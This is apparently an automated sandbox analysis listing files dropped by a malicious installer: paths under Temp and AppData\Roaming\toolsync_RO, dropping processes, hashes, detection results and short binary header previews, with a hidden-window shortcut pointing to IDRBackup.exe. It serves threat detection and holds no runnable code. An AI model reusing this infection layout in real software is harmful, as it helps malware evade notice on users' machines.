                                                                                                Preview:U.m..w.j.q....ox.V.KjW...N^tE..ckFRj.....`...aolj..DPUmm.NR.bP..L.k.J..Z..CK.I`k...FlmuX._.....E]M..v.r.v...xh..q..x^....dG..y...oigZh.ekGyq\.Mj_..NY..o.tvgGB...A.s..d..j...uk..w.m[oU....\.c..d.hKL....A.MZ.W.CiW.mp..qd.l.Q..L....F.T..u..Y.AAf.h..I..s.Y.]UjS.YO.W......qSYw.....CHilS.y...ZA.H.XyRa.mlB.p..Ya...f..q.NB....oy....s..p.QS.fHN..e..qm......f.sSGg_.jvH.M\VNA...Jtq`..am..mGh.Wk...I..U..^...W.]H.j.].pK.a.ZL.USl\.W_.mM.Q.`.i...Ns.qcs.uU.l...........kd.........F.KH.i.k......VV.i.aS....esO.OsFjv.`....o.hJ..]\..wL..WQ..[At..A..].B._.bk].X.H...Ps...`e..T.j.]..f...YA_.[...Em..m..O..l....J.J.n.^..R.Z`Zt..vK.iX.e.....S...]L...C.[..m...w.^O..e...DWdVh.CEs...y...x.^R....e.\.\OtwL...nLR.Q.p.GV..x...._.U.HQ....J.Kf.fHw.ikk..S..w\...n..hN.qM.Aq.Z...DjX.x.x..gF...K..\.........EOFP^\[y.t....UW...c..^^UiE.vpeF..X].a...F..Cg...h_OsXFKyQB.S.Mu..iwK.s......qfT.F.].....mUx.TCE...dkXO....f..q.d.Rt...g.i..._s..HH.vKY.EI.X...E..^.w.G.Cs...l..E.Qm.i..a....Q.G.Os]......w...MYih.tT.cuP..n..P.W\kaD..DHAjK..

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1111552
                                                                                                Entropy (8bit):6.828560472335152
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:ebhz5FWbA1msvIRzM7Rk5JZzSQ4+Is2D9Tx0gbo5:l2hTKgbo5
                                                                                                MD5:630991830AFE0B969BD0995E697AB16E
                                                                                                SHA1:FEDA243D83FBA15B23D654513DC1F0D70787BA18
                                                                                                SHA-256:B1FCB0339B9EF4860BB1ED1E5BA0E148321BE64696AF64F3B1643D1311028CB3
                                                                                                SHA-512:2F2BF30BE615F44E56ECCA972A9FCBE27187045E13C468D039645E5CC6D01F990CDE32B322965F245BC8FCCFD0920F09A0AFA1D4DE0748ED01DD9FFC1BD24692
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H...........................................P.........................`..................................................X$...p...................@..............................................................x............................text.............................. ..`.itext........... .................. ..`.data...tw.......x..................@....bss.... T...@.......(...................idata..X$.......&...(..............@....edata...............N..............@..@.rdata...............0..............@..@.reloc...............2..............@..B.rsrc........p......................@..@.............`......................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\sqlite3.dll

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):925744
                                                                                                Entropy (8bit):6.531971164117173
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:rRxNAQB74x0FwTuis6eCwjH+SW61zf/AD:ra+syis/LjH+S31E
                                                                                                MD5:9D255E04106BA7DCBD0BCB549E9A5A4E
                                                                                                SHA1:A9BECB85B181C37EE5A940E149754C1912A901F1
                                                                                                SHA-256:02F37A8E3D1790AC90C04BC50DE73CD1A93E27CAF833A1E1211B9CC6294ECEE5
                                                                                                SHA-512:54C54787A4CA8643271169BE403069BC5F1E319A55D6A0EBD84FB0D96F6E9BDDC52B0908541D29DB04A042B531ABD6C05073E27B0B2753196E0055B8B8200B09
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......[...........!.....F...................`.....a................................k3........ .........................w ......0........................:... ...3...................................................................................text...0D.......F..................`.P`.data........`.......L..............@.`..rdata........... ...h..............@.`@.bss....(.............................`..edata..w ......."..................@.0@.idata..0...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...3... ...4..................@.0B/4...........`......................@.@B/19.........p......................@..B/31.................................@..B/45..........0......................@..B/57..........P......................@.0B/70.....i....`..........

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\vcl120.bpl

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2012160
                                                                                                Entropy (8bit):6.677286319553433
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:L2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6T:LRSf0Ww+NpPSyzYY8c8YEPI4+T
                                                                                                MD5:849070EBD34CBAEDC525599D6C3F8914
                                                                                                SHA1:B0543D13F4D0CB787ABDAAF1D3C9A5AF17C87AFA
                                                                                                SHA-256:B6F321A48812DC922B26953020C9A60949EC429A921033CFAF1E9F7D088EE628
                                                                                                SHA-512:F2CA685B01BE9D1B77D8D924E0097DDACEE7628CC1AAD8A87D8B18A699558D38A7851E6CFF8BB2B8AE1980824588AF5C3AC75B7B4198B620144DFF61611F3AEB
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H.....................l............... .....P.................................e...............................P...'...`.......................t...@.......^.............."....................................y...............................text...4........................... ..`.itext.............................. ..`.data...\!... ..."..................@....bss....<....P.......*...................idata.......`.......*..............@....edata...'...P...(..................@..@.rdata.."............8..............@..@.reloc...^.......`...:..............@..B.rsrc...............................@..@.....................t..............@..@................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\vclx120.bpl

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225792
                                                                                                Entropy (8bit):6.542140301791508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:F4af8kXL6nX0YXjvkWQ5vYhbNkWPFOEJ8YZbjeTl0Y25zFgYBzRKy6sB65avEtAt:Oaf8kLWL7Xov8bNxdOmrfgYmHA6I
                                                                                                MD5:7DAA2B7FE529B45101A399B5EBF0A416
                                                                                                SHA1:FD73F3561D0CEBE341A6C380681FB08841FA5CE6
                                                                                                SHA-256:2BDF023C439010CE0A786EC75D943A80A8F01363712BBF69AFC29D3E2B5306ED
                                                                                                SHA-512:8E9EC71943C412FE95563E488D91E6EF0041C16A08654FF14B11953F134007657D1E6EC95952F6B9C8B8567A35368840618DB06E5CD99ABC43AE495A3FBC6B96
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H..........................................1P.................................T...................................|......&....P...>...........2...@... ...!..............!................................... ................................text...8........................... ..`.itext.............................. ..`.data...P...........................@....bss....<................................idata..&...........................@....edata...|.......~...R..............@..@.rdata..!...........................@..@.reloc...!... ..."..................@..B.rsrc....>...P...>..................@..@.....................2..............@..@................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2364728
                                                                                                Entropy (8bit):6.606009669324617
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                MD5:967F4470627F823F4D7981E511C9824F
                                                                                                SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ikltbdky

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2565632
                                                                                                Entropy (8bit):6.720282075797925
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:fTeU0WaITRnbPiAGTeYUgi4t+viMs5Y7WCE2N1wlbRksZUwHucOIsBz84k:Ljxa+IlN
                                                                                                MD5:F70DBF7B7AAF190BC50F778118099E1A
                                                                                                SHA1:50741A88FD591CB68A9140384CC8578AA0E5C33F
                                                                                                SHA-256:3128C06BBA23756FE064022287364DC4716DDF5FA06ECEB38786B9CB391C53EF
                                                                                                SHA-512:5643F2783D4286404A9DEA3A3FAD76E09DD3A694126FD193AFD0040E57319C2886CB4F9B2456BA29F50E3C87E5D20A896559ED88A85E791C016205B02E6D511D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....,U..................$...'..b..W..........@......................................(...`... ...............................................-.T.....-.8....P&.\j............-.............................@E&.(...................8.-..............................text...x.$.......$.................`..`.data.........$.......$.............@....rdata..H.....%.......%.............@..@.pdata..\j...P&..l...>&.............@..@.xdata...R....&..T....&.............@..@.bss.... a... '..........................idata..T.....-.......&.............@....CRT....0.....-.......'.............@....tls..........-.......'.............@....rsrc...8.....-.......'.............@..@.reloc........-.......'.............@..Bcvgr..... ....-.......'.............@...................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wpfwiocg

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 30 00:24:11 2024, mtime=Sat Nov 30 00:24:11 2024, atime=Tue Nov 19 05:46:10 2024, length=2137808, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):906
                                                                                                Entropy (8bit):5.061305520669899
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8eqv9wYCo4BWCwdY//Ni/y5L0DZtGCnwoOjA1rHgDyJCnwi1bUxuBmV:8eeuAj+ky1ITtn9yA12yYn91bHBm
                                                                                                MD5:3E0663C5610954AB5B51413E9FA6657D
                                                                                                SHA1:BCC9F13602D3204D875C88663AA00955DED73BE9
                                                                                                SHA-256:F86160B002EFA6E76AB33AE71CDD35E6115B222BD110B19AC77DC0387CAE8B25
                                                                                                SHA-512:40B85E327165B322C3C8E4512A1B3E976C5266CD5A0DA309A310A65DE6CB09CF5AC2D0588FFC9E773EA65A7310873977A375485537A22B1F426B5E97D2CF8CA4
                                                                                                Malicious:false
                                                                                                Preview:L..................F.... ...mDe..B...|...B....N:... .......................:..DG..Yr?.D..U..k0.&...&......vk.v.....8...B..]V..B......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^~Y.............................%..A.p.p.D.a.t.a...B.V.1.....~Y....Roaming.@......CW.^~Y.............................cY.R.o.a.m.i.n.g.....`.1.....~Y....TOOLSY~1..H......~Y..~Y.............................>3.t.o.o.l.s.y.n.c._.R.O.....h.2.. .sY.5 .IDRBAC~1.EXE..L......~Y..~Y................................I.D.R.B.a.c.k.u.p...e.x.e.......g...............-.......f.............E......C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe..'.....\.....\.R.o.a.m.i.n.g.\.t.o.o.l.s.y.n.c._.R.O.\.I.D.R.B.a.c.k.u.p...e.x.e.`.......X.......128757...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                C:\Users\user\AppData\Local\Temp\wqosufsc

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2565632
                                                                                                Entropy (8bit):6.720282075797925
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:fTeU0WaITRnbPiAGTeYUgi4t+viMs5Y7WCE2N1wlbRksZUwHucOIsBz84k:Ljxa+IlN
                                                                                                MD5:F70DBF7B7AAF190BC50F778118099E1A
                                                                                                SHA1:50741A88FD591CB68A9140384CC8578AA0E5C33F
                                                                                                SHA-256:3128C06BBA23756FE064022287364DC4716DDF5FA06ECEB38786B9CB391C53EF
                                                                                                SHA-512:5643F2783D4286404A9DEA3A3FAD76E09DD3A694126FD193AFD0040E57319C2886CB4F9B2456BA29F50E3C87E5D20A896559ED88A85E791C016205B02E6D511D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....,U..................$...'..b..W..........@......................................(...`... ...............................................-.T.....-.8....P&.\j............-.............................@E&.(...................8.-..............................text...x.$.......$.................`..`.data.........$.......$.............@....rdata..H.....%.......%.............@..@.pdata..\j...P&..l...>&.............@..@.xdata...R....&..T....&.............@..@.bss.... a... '..........................idata..T.....-.......&.............@....CRT....0.....-.......'.............@....tls..........-.......'.............@....rsrc...8.....-.......'.............@..@.reloc........-.......'.............@..Bcvgr..... ....-.......'.............@...................................................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2137808
                                                                                                Entropy (8bit):6.8117077805342365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:fsLSdP5XOFS5DbCVVtBF8SIIa0awy+qW5M8hbGY7WVaQX/VjjFD7YpmTfWD3B7jn:ELmVOFUK1JIIa0awN5d7WVaQX1T+z9D
                                                                                                MD5:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                SHA1:2A2ECBBD4840C486B3507A18307369336EC5A1AA
                                                                                                SHA-256:5AE3838D77C2102766538F783D0A4B4205E7D2CDBA4E0AD2AB332DC8AB32FEA9
                                                                                                SHA-512:4E6BD3F85C71A8FF0DB1E92675295D5BBD0EE8CF24D4DF4150A922E9C25FA1F7116263AC4E55C9A9420416FD0388DB593C1FE43D22D0A8D25CAA20EEB13F5080
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....Yif.....................~....................@...........................$.....%. ..........@...................................................8 ..f.......$......................................................,"...........................text...h........................... ..`.itext.............................. ..`.data...@...........................@....bss.....................................idata..............................@....tls.........p...........................rdata..............................@..@.reloc...$.......&...0..............@..B.rsrc................V..............@..@.............`".....................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\datastate.dll

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):60928
                                                                                                Entropy (8bit):6.076596555078833
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:2d3yLVTcRkZrVlqE6BY6TalNPzrrSRTy3IXGX8prYXDRMLu8Vp4:GCpTzriE6BYrrJIXJpCRM68Vp4
                                                                                                MD5:F2986DC64A9ECCFAD317CB01A42954BC
                                                                                                SHA1:84838D33FDE059E3AED7AD38B09642C802F0EAC8
                                                                                                SHA-256:86C75285D2E51B8E5BA2191C6B1888BBE69437B767E19C530771C08F6FAC7C46
                                                                                                SHA-512:B8DE5D2450B7685A865A3565965E786745E63ADB4F926896DD67D6E1BEA802FCD2A03A61E464CA1F7153FF90A0582E92D0946A558F4FC7468CA035853C7E5E73
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.O.@...@...@..h....@...8...@...8...@......@...@...@...8...@...8...@.......@...8...@..Rich.@..................PE..L.....&]...........!.........X......n5.......................................0............@.....................................<.......................................................................@...............(............................text...S........................... ..`.rdata..b-..........................@..@.data...d...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\hso

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4526833
                                                                                                Entropy (8bit):7.966185784897977
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:HNfg5MzZZKcUrhgrhiNcqM7VFHrCgRUVpS5QMsWpBs3KKLnb9owzajg+l1:HuKZBYwhiNcqM7npRsS5QMD8jb9owu1
                                                                                                MD5:AE698161CA0CD6BAF53788C39B7D55A8
                                                                                                SHA1:C03513DC4712FE46517159FAF2D7BCCDF4DA2C58
                                                                                                SHA-256:ED4905E10A4416F1C878EBBADAEC55A76490BAF8B9EDBBD99DB17FB62311FF64
                                                                                                SHA-512:A6D4391E39C77A30900B7FB377060E233FF5D7A770BF0979CACC88108263BF4BFBEE369BD95A4AFF07C99EE20B12A15D9B9BF399B33645614985239B5CCFC44B
                                                                                                Malicious:false
                                                                                                Preview:x..b\...wc.x..^....\.RFT..EN.Eu...I.CUP..em.W.....R.bX....Q....P.Mhu...^.m[..jc...E.X..q..O..]....EL]Ce.....Zx.UC...issEw].GoS.dEviIT.Vk...kt.O..x...ak..jL.Am....pLJ..._..PZ..e..\.pqW......KU^....c.\....YGP]kGb...o.qb.B.FYsE.M..mUB..S..._._._.v.m.\lF..hCN......`...A..dW...if[.....qYMk..UG.K..OOnFX`.h.....I.Y..L..`..N..Rnm.Bplo.Vv...O.._d_qP..Y...Bv.ef\...PH.H..._.CXFA.r.....pNEI......d......s..._....v.....gBoGA.Zus..J.m\.I.X....V..Kyh[jJ.[i.q.h...V..y._QQ....w...X..a.hJ.h......Lk.i....L......F.a.....[.VZTf.ol.La...o.\.Pt...R.R..D.b..I...t.Ab...r.v.......]n.JVF...G`.b...MjVLJ.eaak._dE..Q.Sx......b...N.k.DL.o.q^Hy.Z...ZJ..l.Rrhu.NP.U.lKB.\.G.y.f.rEq.Pj.U.v.[q..LV...YM.DyX.fK.eg.S.....r...ksY.p.].B.k_.l.l.S...L.D..eT[k.K...V..`q.X.\.Dh.J\.hKd..^mi....`..mZVU.....d..`IF.x......smJcs......ot.ta.q.k...Sk.C.C.M..q.n..KN.f..M.X.H..Q`kLa.P...w..^V...f.o.Y..lZXg.c.l...B.glv.....e.a.PbW.DE..TpRCSOMM.q..pY.y..a.Z...N...Mv^QM.o..M.i..e^..T.Jtx.NcAI.^..^P^..TJ.x..c..L..ej..^...k[l.Fk.....m..t..JP`D.

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\madbasic_.bpl

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):214016
                                                                                                Entropy (8bit):6.88876124830787
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:wN/kSQxE6qeM/k4qTl5L5e5+53WCG1CbF/Frf1:PqeM/k4qR5L5e5+53WulZ1
                                                                                                MD5:DC6655A38FFDC3C349F13828FC8EC36E
                                                                                                SHA1:95DB71EF7BFF8C16CE955C760292BAD9F09BB06D
                                                                                                SHA-256:16126FF5DAA3787A159CF4A39AA040B8050EBB66AB90DBB97C503110EF72824A
                                                                                                SHA-512:84B85F2AAAD773CBE039022DB3D0C35263343243F0D021D7AA3086904B80DD309E6D2A93613CC774B5DB27335F4D2850151E2BC8F4648B0065F66BD3722C3D69
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.............................0.......@.....W.................................................................0...d......`(......x................@......................".......................................0............................text...x........................... ..`.itext.......0...................... ..`.data...l&...@...(..................@....bss........p.......@...................idata..`(.......*...@..............@....edata...d...0...f...j..............@..@.rdata.."...........................@..@.reloc..............................@..B.rsrc...x...........................@..@....................................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\maddisAsm_.bpl

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):62976
                                                                                                Entropy (8bit):6.769493849077948
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:RhaUyLDjc8SqMhnJ/zq0siFsjB5mYdWtC16+C+024bQJu0D3BIBo1w4Kv57dbhrC:RNy3eqMne0sXB0IWtCLwEJhY0w1SD
                                                                                                MD5:84BC072F8EA30746F0982AFBDA3C638F
                                                                                                SHA1:F39343933FF3FC7934814D6D3B7B098BC92540A0
                                                                                                SHA-256:52019F47F96CA868FA4E747C3B99CBA1B7AA57317BF8EBF9FCBF09AA576FE006
                                                                                                SHA-512:6E7648194738E8E49E48C2450EEF1D482473CD4E5C0E83F292AC9174488F3F22A3B6BA96F07E024C2AB96613D9DB1A97084CA0B3973ED5D88502E0D28E120EF5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.................z...8......4..............W......................... ......~{..................................&.......d........................@......T...............#....................................................................text...4w.......x.................. ..`.itext..<............|.............. ..`.data................~..............@....bss.....................................idata..d...........................@....edata..&...........................@..@.rdata..#...........................@..@.reloc..T...........................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\madexcept_.bpl

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):445440
                                                                                                Entropy (8bit):6.727415549986866
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:mlAz49EKhEV30F8sl88nTjQ4Q50gEcW/jd+o72niVUNMa4Yn2c:mlG4ut30F8slzYlQcW/jd++2nJ6u2c
                                                                                                MD5:21068DFD733435C866312D35B9432733
                                                                                                SHA1:3D5336C676D3DD94500D0D2FE853B9DE457F10FD
                                                                                                SHA-256:835F1141ECE59C36B18E76927572D229136AEB12EFF44CB4BA98D7808257C299
                                                                                                SHA-512:54664A9E60E5A0B148FC4684125B7EAC9CFC57D0BC5838204ED587D62E44C3347C0BAE3192D5C375B6A74335B4FED4FC53248BA542C59022E9761872E09E3EE7
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...f..V.................H...@......<c.......p.....Y.....................................................................O......._......D<...............@...P...A...........@..$...................................l...x............................text....C.......D.................. ..`.itext..D....`.......H.............. ..`.data...t....p.......L..............@....bss....H............Z...................idata..._.......`...Z..............@....edata...O.......P..................@..@.rdata..$....@......................@..@.reloc...A...P...B..................@..B.rsrc...D<.......>...N..............@..@.....................R..............@..@................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\qvi

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):10135
                                                                                                Entropy (8bit):6.530994651641475
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YDdCjuwKxx0Iz3YDkI+eF/CpUZK794s8epq1Zo+VI+uMiDkknW9dRsaAtQxp952d:YBHOIz3YoI+eF68leE3/VYYj5Ds
                                                                                                MD5:C7E234FA36DBC2C97D2ED3974A437417
                                                                                                SHA1:41A8BB3540920F868EA669B909E61071E16497F8
                                                                                                SHA-256:ED115985C0DB3516AE57B9E2D2B8472EBA69F31ACCF7D6A078049B269958CE1C
                                                                                                SHA-512:259A929CD6665F6EC8640E629668E4A90D3261C2B1987A1DD5C51175CCA7CA9B03DF09BEFC9EAB4543F726B6423F393735CEEBF00AD2741DB0D5F14DB732AE11
                                                                                                Malicious:false
                                                                                                Preview:U.m..w.j.q....ox.V.KjW...N^tE..ckFRj.....`...aolj..DPUmm.NR.bP..L.k.J..Z..CK.I`k...FlmuX._.....E]M..v.r.v...xh..q..x^....dG..y...oigZh.ekGyq\.Mj_..NY..o.tvgGB...A.s..d..j...uk..w.m[oU....\.c..d.hKL....A.MZ.W.CiW.mp..qd.l.Q..L....F.T..u..Y.AAf.h..I..s.Y.]UjS.YO.W......qSYw.....CHilS.y...ZA.H.XyRa.mlB.p..Ya...f..q.NB....oy....s..p.QS.fHN..e..qm......f.sSGg_.jvH.M\VNA...Jtq`..am..mGh.Wk...I..U..^...W.]H.j.].pK.a.ZL.USl\.W_.mM.Q.`.i...Ns.qcs.uU.l...........kd.........F.KH.i.k......VV.i.aS....esO.OsFjv.`....o.hJ..]\..wL..WQ..[At..A..].B._.bk].X.H...Ps...`e..T.j.]..f...YA_.[...Em..m..O..l....J.J.n.^..R.Z`Zt..vK.iX.e.....S...]L...C.[..m...w.^O..e...DWdVh.CEs...y...x.^R....e.\.\OtwL...nLR.Q.p.GV..x...._.U.HQ....J.Kf.fHw.ikk..S..w\...n..hN.qM.Aq.Z...DjX.x.x..gF...K..\.........EOFP^\[y.t....UW...c..^^UiE.vpeF..X].a...F..Cg...h_OsXFKyQB.S.Mu..iwK.s......qfT.F.].....mUx.TCE...dkXO....f..q.d.Rt...g.i..._s..HH.vKY.EI.X...E..^.w.G.Cs...l..E.Qm.i..a....Q.G.Os]......w...MYih.tT.cuP..n..P.W\kaD..DHAjK..

                                                                                                C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1111552
                                                                                                Entropy (8bit):6.828560472335152
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:ebhz5FWbA1msvIRzM7Rk5JZzSQ4+Is2D9Tx0gbo5:l2hTKgbo5
                                                                                                MD5:630991830AFE0B969BD0995E697AB16E
                                                                                                SHA1:FEDA243D83FBA15B23D654513DC1F0D70787BA18
                                                                                                SHA-256:B1FCB0339B9EF4860BB1ED1E5BA0E148321BE64696AF64F3B1643D1311028CB3
                                                                                                SHA-512:2F2BF30BE615F44E56ECCA972A9FCBE27187045E13C468D039645E5CC6D01F990CDE32B322965F245BC8FCCFD0920F09A0AFA1D4DE0748ED01DD9FFC1BD24692
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
